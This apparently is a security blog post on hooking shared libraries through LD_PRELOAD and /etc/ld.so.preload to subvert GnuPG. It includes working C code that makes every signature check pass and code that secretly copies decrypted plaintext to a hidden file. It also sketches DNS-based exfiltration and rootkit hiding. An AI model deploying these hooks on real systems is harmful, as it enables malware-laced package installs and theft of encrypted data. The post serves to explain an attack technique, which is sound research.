Subverting Cryptography with Dynamic Library Interpolation

By Michael Vaughan

Cryptography is one of the most important security measures employed by organizations all over the world. Unlike many controls, Cryptography is as ubiquitous as it is provably effective, providing protection for information as it is stored and as it travels. Software, documents, and virtually all information that is handled securely depends on cryptography for that process, often as the only security measure. The mathematics that drives the field provides provable security, but there is always a distinction between theory and practice, one that is often the source of significant exploits and vulnerabilities. One exploit is explored, by combining understanding from an OS feature frequented by malware authors and the practical implementation of cryptography on *NIX systems, GnuPG.

Dynamic Libraries

When writing software, there are two strategies to solve the issue of linking foreign code as libraries, those being static and dynamic linking. Static linking involves including all of the code in the final executable, resolving all relocations and creating a completely self-contained program. This approach results in larger programs, which is often not desirable as library code is frequently repeated. Dynamic linker/loaders have become more common than static linking as a result, though static linking has fallen back into favor as disk size has increased, with modern languages and their build systems increasingly supporting it, sometimes by default. Dynamic linking provides considerable advantages over this method by letting executables share libraries, instead of having their own copy. This makes the executable dependent on the dynamic linker to resolve relocations to the included code, but lets them share a common library as a tradeoff. This dependence, and trust, of the dynamic linker is a relationship that can be taken advantage of, for both benign and malicious purposes.

Dynamic Libraries in Linux

            Let’s say that two libraries export the same symbol, maybe it’s puts(). How does the dynamic linker know which one the application is looking for? It turns out that it uses a specific hierarchy of libraries to check. In the case of puts() specifically, it would look in libc for that symbol, resolve it, save the address of puts() in the GOT of the application for ease later, and actually jump to the function to run it. For this puts() specifically it would usually see it in libc, since libc is early in the order of libraries. To see the full order for yourself you can use ldd, a wrapper script for ld.so that will list everything out:

ldd run on /bin/ls, on a Linux Mint computer

As we can see from the output, /bin/ls uses SELinux, libc, libdl, pthread, and other shared libraries. When /bin/ls needs to resolve a symbol, ld.so first checks in linux-vdso, doesn’t find it there, then libselinux.so, and finally finds it in libc. A common malware technique is to intercept calls to expected functions by modifying this order, effectively injecting a malicious shared object into the runtime of the process. This can be accomplished in a few ways, but the easiest and likely most often used method is by employing the LD_PRELOAD environment variable. From man ld.so(8):

      LD_PRELOAD

              A list of additional, user-specified, ELF shared objects to be

              loaded before all others.  This feature can be used to selec‐

              tively override functions in other shared objects.

As we can see here, LD_PRELOAD lets us alter the order by putting a shared library at the top of the list. It even tells us that we can use it to override functions, which is exactly what we’ll do. Making a shared object is possible in a few different languages, but it’s easiest to do in C. As a first exercise we can intercept calls to rand():

Chosen by fair dice roll.

To make sure this works, you need to have the same function signature as the one you are intercepting. To compile with GCC you need to pass -shared and -fPIC to create a shared library and compile it as position-independent code, respectively. As a demonstration we’ll intercept the calls to rand() in a short program that prints some random numbers. As you can see, all we need to do is pass LD_PRELOAD to see the effect, no recompilation or static linking required.

If we run ldd on the binary with LD_PRELOAD set to our library, then we can see

As we can see here, our library lib.so is placed above libc. In truth LD_PRELOAD does not technically place our library at the exact top of the list, at least not anymore. The first entry, linux-vdso.so.1, is the Linux kernel’s VDSO, a virtual dynamic shared object which exports syscalls to userspace. This is done for performance reasons and cannot be interfered with using LD_PRELOAD, but does not impede this technique. When programs we preload call rand(), they first search in the VDSO, don’t find it, and then check our library and resolve it from there successfully. We effectively bypass libc.

            One issue with using LD_PRELOAD of course is that it requires an environment variable to be set, which while not displayed by default would require it to be sourced by the shell or prepended to every tricked program. There is a better solution and that is with a little known file called /etc/ld.so.preload. This file does not normally exist, but dynamically linked programs check for its existence on startup. If a file path to a shared library is placed in this file, then every dynamically linked program will check for /etc/ld.so.preload, read in the path, and actually insert the shared library at that path in the top of the list to check from. This works system-wide, and subverts LD_PRELOAD’s limitations on setuid binaries. If you get root access once, you can set code that will be run on every dynamically linked process on the system.

Subverting GnuPG

GnuPG, GPG, or the GNU Privacy Guard is a free and open source implementation of OpenPGP. It is the de-facto standard for PGP on Linux and most *NIX systems, and is used for many different applications, including package signatures and personal document encryption/signing. Since it is used for code signing, its integrity is required for a secure system, free from application backdoors and malicious man-in-the-middle attacks. Compromising it allows an attacker to trivially serve malware to a user over standard channels, paving the way for man-in-the-middle attacks on virtually any downloaded and signed file.

GnuPG is written in C as a dynamically linked application. It performs all of its actual cryptographic operations from a separate library, libgcrypt. Since it is dynamically linked, intercepting calls to its core functions is as easy as the last example. To get a sense of what functions it actually calls, we can run the application through ltrace. This program is similar to strace, but instead of logging all system calls, it instead logs all dynamic library calls. Since syscalls are often made through library wrapper functions, the output can seem similar, but they are distinct. If we run GnuPG through it we can isolate libgcrypt functions to take a look at.

Compromising Digital Signatures

As a first exercise, we can compromise the integrity of digital signatures. As an attacker with root access we can run this for all GnuPG operations conducted on the system. If we run a verification with –verify on a file through ltrace, we can see that it calls a specific function a number of times: gcry_pk_verify(). The prefix ‘gcry’ insinuates that it is a libgcrypt function, and it in fact is the one that actually verifies the signature for a given chunk of data. ltrace tells us that this function returns 0, and atrip to the libgcrypt documentation gives some context:

The function returns 0 when the data has not been tampered with. It takes in a gcry_sexp_t sig argument, which is the signature as an S-expression. It also takes S-expressions for the data chunk and public key we’re verifying against. gcry_error_t is a custom type but ultimately compiles down to an integer. So with this knowledge, we can make a simple library that ensures that all signature verifications pass:

gcry_error_t gcry_pk_verify(gcry_sexp_t sig, gcry_sexp_t data, gcry_sexp_t pkey) {
   return 0;
}

            Since errors are not fun.

Now if we were to MITM the system’s package repositories, we could replace installed packages with malware-laced variants and the package manager would accept them without fault, since it uses GnuPG to sign software. In one line of code we’ve compromised what the libgcrypt developers call the “most commonly used” functionality, and can deploy it across the entire system.

Subverting Data Encryption

GnuPG and PGP more generally are primarily used for digital signatures and encryption, often at the same time. Now that we’ve subverted the signature check, we can also subvert encryption. We can do this by saving information as it is decrypted. If we again run GPG through ltrace and observe its behavior during a decryption operation, we can see several times where the plaintext of the file is handled just by searching for it:

Output of ltrace from a decrypt operation. Typos included.

As we can see here, the test file is handled by memcpy() and fwrite(). We can also see that a reference to the memory holding it, 0x26c65c0 in this case, is passed to another libgcrypt function gcry_md_write(), as well as fwrite(). The latter function is what actually outputs the information to the screen, either as text or as raw bytes. Since that is the final form of the information, it’s best to try and intercept this function call so we can read the fully decrypted data. Fortunately, since fwrite() is a libc function, we can do that easily. fwrite() is often called several times to output the chunks of the file in order.

__attribute__((constructor))
static void initgpg() {
   // naive check
   FILE * fp = fopen("/proc/self/cmdline", "r");
   char * cmdline = calloc(1, 512);
   if(!cmdline) return;
   fread(cmdline, 512, 1, fp);
   if(strstr(cmdline, "gpg")) {
       AMGPG = 1; // we are gpg
   }
}

The initgpg() function is compiled as a constructor function, which is the library’s entrypoint when loaded into memory. This is a GCC feature. It will determine the current process using a non-portable and naive method of checking its own cmdline and comparing it to “gpg”. This is reasonably effective as most users don’t change the name of GnuPG, but more sophisticated methods of determining this exist. For now, this is appropriate for almost all systems that use the program. Then we can write our interception for fwrite():

size_t (*o_fwrite)(const void *, size_t, size_t, FILE *);
size_t fwrite(const void *ptr, size_t size, size_t nmemb, FILE *stream) {
   if (!o_fwrite) o_fwrite = dlsym(RTLD_NEXT, "fwrite");
  
   if(AMGPG) {
       // append output to secret file
       char * fname = malloc(1000);
       ssize_t res;
       snprintf(fname, 1000, "%s%04d", hiddenpath, chunk);
       int fd = open(fname, O_WRONLY | O_APPEND | O_CREAT, 0644);

       if (fd) {
           if ((res = write(fd, ptr, size*nmemb)) != size*nmemb) {
               perror("Error writing data to file! ");
           }
           close(fd);
           chunk++;
       } else {
           perror("Error creating file: ");
       }
       free(fname);
   }

   return o_fwrite(ptr, size, nmemb, stream);
}

It’s important to note here that any fwrite() calls made by GPG will be caught with this, which in the case of decryption will just be the file content. It appears that this is the only place where GnuPG uses fwrite(), which makes sense as unlike status messages file content can vary largely in size. This makes the buffered I/O of the fwrite() API more appropriate. The “chunk” variable is declared as a global, set to zero and incremented with every chunk. This is to keep the order and make it easy to find later. Similarly “hiddenpath” is a global constant that is a file ending with “chunk”, with the chunk number appended on via snprintf(). o_fwrite is the function pointer that is resolved to the original libc fwrite() function. This is done manually at runtime by using dlsym() and the RTLD_NEXT directive, which will search for the second argument in the symbol table of the next library in the hierarchy of libraries (shown by ldd). The function pointer is resolved from libc and saved as o_fwrite, which is called at the end to make sure that the code writes as expected by GnuPG.

Further Attack Avenues

More attack methods are possible and effective in this application. The attacker could intercept calls to gcry_pk_genkey(), or the other key generation functions to convince them to use a convincing but backdoored PRNG. The chunking strategy is naive outside of a proof of concept – the current strategy overwrites chunks on the disk between program executions. This is trivial to improve for actual engagements. A more practical strategy would be to send the file content via a covert channel. One could Base32 encode the data and send it as DNS requests to an attacker C2, use ICMP data sections, or simply make a request with something like libcurl. An LD_PRELOAD rootkit is possible, which when intercepting libc functions like readdir() and stat() can hide files on disk from utilities like ls and ps. This could be exploited to not only hide secret data but to hide the existence of the malware itself. With the same root privileges used to install in /etc/ld.so.preload, an attacker could drop a kernel implant to hide the malicious library from the maps list of each process. This would allow hooking reads from the seq_file interface for /proc/self/maps, to remove the malware from entries in the list and make the library nearly undetectable from userspace utilities.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s